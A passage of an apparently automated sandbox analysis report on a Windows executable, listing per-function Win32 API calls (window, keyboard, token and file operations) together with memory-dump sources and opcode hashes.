                                                                        • Part of subcall function 00C26B57: _wcslen.LIBCMT ref: 00C26B6A
                                                                        • Part of subcall function 00C82DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C82DC5
                                                                        • Part of subcall function 00C82DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C82DD6
                                                                        • Part of subcall function 00C82DA7: GetCurrentThreadId.KERNEL32 ref: 00C82DDD
                                                                        • Part of subcall function 00C82DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C82DE4
                                                                      • GetFocus.USER32 ref: 00C82F78
                                                                        • Part of subcall function 00C82DEE: GetParent.USER32(00000000), ref: 00C82DF9
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C82FC3
                                                                      • EnumChildWindows.USER32(?,00C8303B), ref: 00C82FEB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                      • String ID: %s%d
                                                                      • API String ID: 1272988791-1110647743
                                                                      • Opcode ID: 4df6a50dfb6eada78930b0ba2ea5f56304c966a66f1e646d8a95c937842ec579
                                                                      • Instruction ID: 41d9cab23e5ebb749590e3a49f4440735d70c767bc3a0e836db79ad679b33f41
                                                                      • Opcode Fuzzy Hash: 4df6a50dfb6eada78930b0ba2ea5f56304c966a66f1e646d8a95c937842ec579
                                                                      • Instruction Fuzzy Hash: 9011AF756002056BCF157F609CC9FEE3B6AAF94708F04507AF9099B292DF309A49EB74
                                                                      Function 00C8007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4bfc75a902bf94f212be07ba9b7b8e86d352def20b5b45c693d6a2f1751718df
                                                                      • Instruction ID: 8970e6eec0366e84c36c7a018a5cdac31f949e0dc93f93932e03d5dc575a240f
                                                                      • Opcode Fuzzy Hash: 4bfc75a902bf94f212be07ba9b7b8e86d352def20b5b45c693d6a2f1751718df
                                                                      • Instruction Fuzzy Hash: D6C17D75A00206EFDB54DF94C888BAEB7B5FF48318F218598E415EB261C770EE85CB94
                                                                      Function 00C53E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: __alldvrm$_strrchr
                                                                      • String ID:
                                                                      • API String ID: 1036877536-0
                                                                      • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                      • Instruction ID: 0cc9959e3afb0dc990c6e2cfaf2cdb24a7291ec58918b1334c3e2cbc5a76df86
                                                                      • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                      • Instruction Fuzzy Hash: F5A1AB79D007869FD729CF18C8817AEBBE4EF61385F2841ADED559B281C2348EC9C758
                                                                      Function 00C80436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CBFC08,?), ref: 00C805F0
                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CBFC08,?), ref: 00C80608
                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00CBCC40,000000FF,?,00000000,00000800,00000000,?,00CBFC08,?), ref: 00C8062D
                                                                      • _memcmp.LIBVCRUNTIME ref: 00C8064E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                      • String ID:
                                                                      • API String ID: 314563124-0
                                                                      • Opcode ID: c0f42c8a25fa9642215acdf43f14ae0ed49dbace416c8308281de3d9ffed5525
                                                                      • Instruction ID: 2d447f4610de215ed31724cd7b8c18a1ae88cdd4d254f9f52d9f7b96f9ec5a2f
                                                                      • Opcode Fuzzy Hash: c0f42c8a25fa9642215acdf43f14ae0ed49dbace416c8308281de3d9ffed5525
                                                                      • Instruction Fuzzy Hash: BA814B71A00109EFCB44DF94C988EEEB7B9FF89315F204158F516AB250DB71AE0ACB64
                                                                      Function 00C61391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: c8face580194e9d2e66050003c0414b6928fdd3653c27cd1af8a1cebba277054
                                                                      • Instruction ID: a7001e6c995b1d305ac1ae2af2c01525e1ac49643df84597e45a1c2a3392f30d
                                                                      • Opcode Fuzzy Hash: c8face580194e9d2e66050003c0414b6928fdd3653c27cd1af8a1cebba277054
                                                                      • Instruction Fuzzy Hash: C4412C35900110ABDB317BB98CC66BE3AA4FF41372F1C4225FC29D7291EA748A417272
                                                                      Function 00CB6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowRect.USER32(00F5DC60,?), ref: 00CB62E2
                                                                      • ScreenToClient.USER32(?,?), ref: 00CB6315
                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00CB6382
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientMoveRectScreen
                                                                      • String ID:
                                                                      • API String ID: 3880355969-0
                                                                      • Opcode ID: c6a598d314ebf808d2a0bd756dbcc02080a0c302c284f950a9c04a58805d03db
                                                                      • Instruction ID: d25de83d15725a21196ab2f33f17bc4bed8de9084787cc8d26fe26fc78cae2ed
                                                                      • Opcode Fuzzy Hash: c6a598d314ebf808d2a0bd756dbcc02080a0c302c284f950a9c04a58805d03db
                                                                      • Instruction Fuzzy Hash: 3D512B74900209EFDF10DF58D880AEE7BF5EB55360F148269F925972A0D734EE41CB90
                                                                      Function 00C5B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2fb72f3cc61660019e7d9849559d85fe7220ceab715afbccc7e689121e6bcdc0
                                                                      • Instruction ID: 5b73f3e190ebf00ccba6c670a20126f8f9b73d109ec7c9a11ff5fbaaad733bd5
                                                                      • Opcode Fuzzy Hash: 2fb72f3cc61660019e7d9849559d85fe7220ceab715afbccc7e689121e6bcdc0
                                                                      • Instruction Fuzzy Hash: 25412879A00314AFD7349F38CC41BAABFE9EB88711F20452EF911DB281D3719D859794
                                                                      Function 00C956D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C95783
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00C957A9
                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C957CE
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C957FA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      • Opcode ID: 40c32c6f53f491a892a3ec2325f8e53f863a2663b668f44207f571d6f4f74a1d
                                                                      • Instruction ID: 48bd66e3202c51e8eb8790ef0e1fb071e95e22f3edf5d2a95d177443444763fa
                                                                      • Opcode Fuzzy Hash: 40c32c6f53f491a892a3ec2325f8e53f863a2663b668f44207f571d6f4f74a1d
                                                                      • Instruction Fuzzy Hash: 6E412F35600610DFCF11EF55D584A5EBBE1EF89320B198498E85AAF762CB34FD40DB91
                                                                      Function 00C5D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00C46D71,00000000,00000000,00C482D9,?,00C482D9,?,00000001,00C46D71,8BE85006,00000001,00C482D9,00C482D9), ref: 00C5D910
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C5D999
                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C5D9AB
                                                                      • __freea.LIBCMT ref: 00C5D9B4
                                                                        • Part of subcall function 00C53820: RtlAllocateHeap.NTDLL(00000000,?,00CF1444,?,00C3FDF5,?,?,00C2A976,00000010,00CF1440,00C213FC,?,00C213C6,?,00C21129), ref: 00C53852
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                      • String ID:
                                                                      • API String ID: 2652629310-0
                                                                      • Opcode ID: b5cca259d5b6c4ca5fe50e36246da934a75ba6e1515b392ea1c207a3f67d3bc9
                                                                      • Instruction ID: 5eaeac83cd4f4171ac8c3472825f0a67a89cf300ee86ffc21f0e855871dccfc7
                                                                      • Opcode Fuzzy Hash: b5cca259d5b6c4ca5fe50e36246da934a75ba6e1515b392ea1c207a3f67d3bc9
                                                                      • Instruction Fuzzy Hash: 7531EE72A1030AABDF24DF64DC81EAE7BA5EB41311F050268FC15E6151EB35CE98DB90
                                                                      Function 00C8AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C8AAAC
                                                                      • SetKeyboardState.USER32(00000080), ref: 00C8AAC8
                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C8AB36
                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C8AB88
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: 0d836a337aab5cc15887da3af79cb37af193ab536009790a7e104dff7be27775
                                                                      • Instruction ID: 439ed3f6b0096a23c17c570907a70504b5f0b538a9dd66a0ba84324a12320b96
                                                                      • Opcode Fuzzy Hash: 0d836a337aab5cc15887da3af79cb37af193ab536009790a7e104dff7be27775
                                                                      • Instruction Fuzzy Hash: 57313970A40218AFFF35EB65CC45BFE7BAAAB44318F04421BF0A1561D0D3758E81D76A
                                                                      Function 00CB52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00CB5352
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CB5375
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CB5382
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CB53A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                      • String ID:
                                                                      • API String ID: 3340791633-0
                                                                      • Opcode ID: 11205848080a7cc8b7307cc2f7b437c325a038dbb3d85430a1ce1fa510017287
                                                                      • Instruction ID: f6f18952b6e9982c441bc9e6cb64f4c8479c028f81e569b71370310cb4815419
                                                                      • Opcode Fuzzy Hash: 11205848080a7cc8b7307cc2f7b437c325a038dbb3d85430a1ce1fa510017287
                                                                      • Instruction Fuzzy Hash: B431A334A55A08EFEB309E14CC55FE977E5AB04390F584102FA21963F1C7F59E80EB52
                                                                      Function 00C8AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00C8ABF1
                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C8AC0D
                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C8AC74
                                                                      • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00C8ACC6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: 89bcb66e2ab25335401a0153857a14c3f92a06057e196ee1706344424a206ddb
                                                                      • Instruction ID: 84374333fcb9ddf3ec7f0b4cc0e1c1f29efe5baeb716b5613f32056187180ba2
                                                                      • Opcode Fuzzy Hash: 89bcb66e2ab25335401a0153857a14c3f92a06057e196ee1706344424a206ddb
                                                                      • Instruction Fuzzy Hash: A9312B70A007186FFF35EB698C04BFE7BA5AB49318F08431BE495521D1C3768E85975A
                                                                      Function 00CB7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ClientToScreen.USER32(?,?), ref: 00CB769A
                                                                      • GetWindowRect.USER32(?,?), ref: 00CB7710
                                                                      • PtInRect.USER32(?,?,00CB8B89), ref: 00CB7720
                                                                      • MessageBeep.USER32(00000000), ref: 00CB778C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      • Opcode ID: a19e3e8fbe9ceed77f939153740a62e0d42815e03056df53bdd21442a93eb24f
                                                                      • Instruction ID: 4c1a1293e03dd773ef55b33e31cf9b02a390a4437ad5c86fb7de93f869b10a97
                                                                      • Opcode Fuzzy Hash: a19e3e8fbe9ceed77f939153740a62e0d42815e03056df53bdd21442a93eb24f
                                                                      • Instruction Fuzzy Hash: 3E416B34A09214DFCB12CF59C894FED77F5FB89314F1942A8EC25AB261CB71AA41CB90
                                                                      Function 00C8DF95 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C27620: _wcslen.LIBCMT ref: 00C27625
                                                                      • _wcslen.LIBCMT ref: 00C8DFCB
                                                                      • _wcslen.LIBCMT ref: 00C8DFE2
                                                                      • _wcslen.LIBCMT ref: 00C8E00D
                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00C8E018
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$ExtentPoint32Text
                                                                      • String ID:
                                                                      • API String ID: 3763101759-0
                                                                      • Opcode ID: 9b2bfc8f1f52c4ac3e575ede6129764035db462c12d75ff6fcf7de61286496a5
                                                                      • Instruction ID: 61bb42573b90de8680886a1f93ffde38831e64cae6343a19a08e256d68990a28
                                                                      • Opcode Fuzzy Hash: 9b2bfc8f1f52c4ac3e575ede6129764035db462c12d75ff6fcf7de61286496a5
                                                                      • Instruction Fuzzy Hash: C421D171900214AFCB20AFA8D881BAEB7F8EF45724F144068E905BB285D7709E41EBA1
                                                                      Function 00C8D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,00CBCB68), ref: 00C8D2FB
                                                                      • GetLastError.KERNEL32 ref: 00C8D30A
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C8D319
                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00CBCB68), ref: 00C8D376
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 2267087916-0
                                                                      • Opcode ID: 939b612ac445e158af4c902d9bb0a09376c17e7503cf9e55027ca44ead99ebec
                                                                      • Instruction ID: 4f81beb62d63a4a2c1b35ee8f3ec06b1b067fccc62654d18a4b5701e98df4893
                                                                      • Opcode Fuzzy Hash: 939b612ac445e158af4c902d9bb0a09376c17e7503cf9e55027ca44ead99ebec
                                                                      • Instruction Fuzzy Hash: 132191705043119F8700EF28D8815AEB7F4EE5A328F104A2DF4AAC72E1D730DA45CB97
                                                                      Function 00C81571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C81014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C8102A
                                                                        • Part of subcall function 00C81014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C81036
                                                                        • Part of subcall function 00C81014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C81045
                                                                        • Part of subcall function 00C81014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C8104C
                                                                        • Part of subcall function 00C81014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C81062
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C815BE
                                                                      • _memcmp.LIBVCRUNTIME ref: 00C815E1
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C81617
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C8161E
                                                                      Memory Dump Source
